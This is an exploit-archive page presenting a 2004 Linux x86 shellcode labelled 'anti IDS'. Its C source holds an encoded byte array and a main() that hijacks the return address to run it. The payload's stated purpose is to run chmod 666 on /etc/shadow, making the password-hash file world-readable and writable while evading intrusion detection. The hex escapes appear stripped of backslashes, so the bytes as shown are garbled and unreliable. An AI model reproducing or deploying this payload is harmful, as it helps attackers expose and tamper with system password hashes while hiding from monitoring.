[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 chmod 666 shadow ENCRYPT 75 bytes
# Published : 2004-09-26
# Author : Matias Sedalo
# Previous Title : linux/x86 add user t00r ENCRYPT 116 bytes
# Next Title : linux/x86 symlink . /bin/sh 32 bytes


/*
 * !!!!!! ANTI IDS SHELLCODE !!!!!!
 *
 * s0t4ipv6@shellcode.com.ar
 * 0x17abril0x7d2
 *
 * !!!!! ENCRIPTADA !!!!!

 * 75 bytes
 * chmod 666 /etc/shadow

 * !!!!! ENCRIPTADA !!!!!
 *
 * Para mas informacion
 * Descargue http://www.shellcode.com.ar/Projects/JempiScodes(version).tgz
 *
 * !!!!!! ANTI IDS SHELLCODE !!!!!!
*/

#include <stdio.h>

char shellcode[]=
"xebx1bx5fx31xc0x6ax53x6ax29x59x49x5bx8ax04x0f"
"xf6xd3x30xd8x88x04x0fx50x85xc9x75xefxebx05xe8"
"xe0xffxffxffx03xb6x90x07xbex39xbax79x6cx87x20"
"xf0x48xcfx0ex8fx40x3dxb2x4ex0ex7fx72xb2x97xf3"
"xe4xffxffx2fxb5xeexe8xb3xa3xe4xf6xfaxf4xe7xdb";

void main() {
        int *ret;
        ret = (int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
        (*ret) =(int)shellcode;
}

// www.Syue.com [2004-09-26]